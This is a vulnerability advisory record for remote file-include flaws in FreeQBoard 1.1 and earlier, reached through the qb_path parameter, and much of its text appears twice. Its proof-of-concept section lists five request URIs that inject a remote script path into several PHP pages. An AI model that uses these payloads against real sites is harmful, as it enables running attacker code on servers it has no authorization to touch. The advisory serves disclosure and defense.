FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
BID:21394
CVE-2006-3475 |Info
FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21394 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 01 2006 12:00AM |
| Updated: | Dec 02 2006 01:24AM |
| Credit: | -= SHELL =- is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
free QBoard free QBoard 1.1 free QBoard free QBoard 1.0 |
| Not Vulnerable: | |
Discussion
FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
FreeQboard 1.1 and prior versions are vulnerable to these issues.
FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
FreeQboard 1.1 and prior versions are vulnerable to these issues.
Exploit / POC
FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/index.php?qb_path=shellcode.txt?
http://www.example.com/[path]/faq.php?qb_path=shellcode.txt?
http://www.example.com/[path]/delete.php?qb_path=shellcode.txt?
http://www.example.com/[path]/contact.php?qb_path=shellcode.txt?
http://www.example.com/[path]/about.php?qb_path=shellcode.txt?
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/index.php?qb_path=shellcode.txt?
http://www.example.com/[path]/faq.php?qb_path=shellcode.txt?
http://www.example.com/[path]/delete.php?qb_path=shellcode.txt?
http://www.example.com/[path]/contact.php?qb_path=shellcode.txt?
http://www.example.com/[path]/about.php?qb_path=shellcode.txt?
Solution / Fix
References
FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- freeqboard Web Site (freeqboard)
- freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability ("-= SHELL =- -= SHELL =-"